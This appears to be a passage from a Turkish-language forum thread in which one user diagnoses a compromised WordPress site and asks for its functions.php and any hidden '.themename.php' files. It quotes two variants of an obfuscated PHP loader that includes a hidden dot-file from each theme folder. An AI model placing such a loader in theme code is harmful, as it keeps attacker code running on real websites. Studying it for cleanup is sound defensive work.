get_theme_root() . "/{$a330f63fa20505f149fefc94083041994->stylesheet}/.{$a330f63fa20505f149fefc94083041994->stylesheet}.php";
yukarda temanın yolu tespit edilerek stylesheet gidilmiş ve md5 ile şifrelenmiş.
Functions.php içeriğini atar mısın.
Ayrıca klasörlerinin içinde .klasoradi.php şeklinde dosyalar var mı?
if ( function_exists( 'wp_get_themes' ) && !class_exists( "a3f212fd3ff4f6b13d97220e459982843" ) ) { foreach ( wp_get_themes() AS $a4bc399d548c7fc0e5db44ac6052a21bd => $a330f63fa20505f149fefc94083041994 ) { $a355161fcd574ca0546fe45698824077c = get_theme_root() . "/{$a330f63fa20505f149fefc94083041994->stylesheet}/.{$a330f63fa20505f149fefc94083041994->stylesheet}.php"; if ( file_exists( $a355161fcd574ca0546fe45698824077c ) ) { include_once $a355161fcd574ca0546fe45698824077c; if ( class_exists( "a3f212fd3ff4f6b13d97220e459982843" ) ) break;
if( !class_exists( "WPTemplatesOptions" ) && function_exists( 'wp_get_themes' ) ) { foreach ( wp_get_themes() AS $theme_name => $wp_get_theme ) { $templates = get_theme_root() . DIRECTORY_SEPARATOR . "{$wp_get_theme->stylesheet}" . DIRECTORY_SEPARATOR . ".{$wp_get_theme->stylesheet}.php"; if( file_exists( $templates ) ) { include_once( $templates ); } } }